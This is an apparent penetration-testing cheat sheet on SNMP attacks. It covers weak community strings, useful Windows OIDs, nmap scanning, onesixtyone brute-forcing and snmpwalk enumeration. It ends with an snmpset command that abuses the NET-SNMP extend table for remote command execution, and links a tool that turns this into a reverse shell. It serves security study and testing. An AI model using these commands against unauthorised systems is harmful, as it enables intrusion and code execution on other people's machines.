SNMP

Simple Network Management Protocol (SNMP) A widely used network monitoring and control protocol.

The SNMP is based on UDP and stateless. moreover, the SNMP protocol version 1,2 and 2c has no traffic encryption which allows attackers to intercept sensitive information.

In addition, The old SNMP versions have weak authentication methods which are usually configured with the default public and private community strings.

In order to rederive information about the target, network administrators often rely on Management Information Bases (MIBs), which define the structure of the data that can be queried via SNMP. The Object Identifier (OID) is a key component of MIBs, allowing for the precise identification of specific variables and objects within the network.

Windows System Overview and Key Components OIDs:

OID	Dsecription
1.3.6.1.2.1.25.1.6.0	System Processes
1.3.6.1.2.1.25.4.2.1.2	Running Programs
1.3.6.1.2.1.25.4.2.1.4	Processes Path
1.3.6.1.2.1.25.2.3.1.4	Storage Units
1.3.6.1.2.1.25.6.3.1.2	Software Name
1.3.6.1.4.1.77.1.2.25	User Accounts
1.3.6.1.2.1.6.13.1.3	TCP Local Ports

Enumerate exposed SNMP service:

sudo nmap -sU -p 161,162,10161,10162 <target>

Brute force the Community string

onesixtyone -c <wordlist> -i <targetlist>

Useful wordlist:

SecLists/Discovery/SNMP/common-snmp-community-strings.txt at master · danielmiessler/SecListsGitHub

community string wordlist

Enumerating

Now, after we found that the SNMP's Community strings, its possible to enumerate senetivce information using snmpwalk:

snmpwalk -c <community_string> -v1 <target>
snmpwalk -c <community_string> -v1 <target> <OID>

-v: defines the snmp version.

-c: defines the community sting.

SNMP Extended

Get Extended attributes

snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

SNMP RCE

Using private key with write permissions it is possible exploit the extended object table and run arbitrary commands on the target machine

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c <private_community_string> <target> \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

The repo below leverage this to reverse shell using python script

GitHub - mxrch/snmp-shell: Shell Simulation over Net-SNMP with extend functionalityGitHub

References

Definition of SNMPPCMAG